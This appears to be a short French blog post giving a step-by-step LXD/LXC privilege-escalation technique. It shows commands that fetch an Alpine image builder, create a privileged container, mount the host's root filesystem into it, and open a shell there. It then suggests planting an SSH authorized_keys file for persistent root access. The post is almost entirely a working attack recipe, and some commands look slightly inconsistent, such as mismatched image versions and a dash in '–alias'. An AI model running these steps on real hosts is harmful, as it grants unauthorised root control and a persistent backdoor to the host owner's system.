Vulnérabilité LXC

wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
chmod u+x build-alpine
lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz –alias myimage
lxd init alpine:v3.12 mypool
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
cd /mnt/root/root
Le répertoire /mnt/root est le système de fichier root de l’hôte
Il suffit maintenant de se créer un répertoire .ssh et une clé authorized_keys pour se connecter par ssh (si root permis de se connecter)

Laisser un commentaire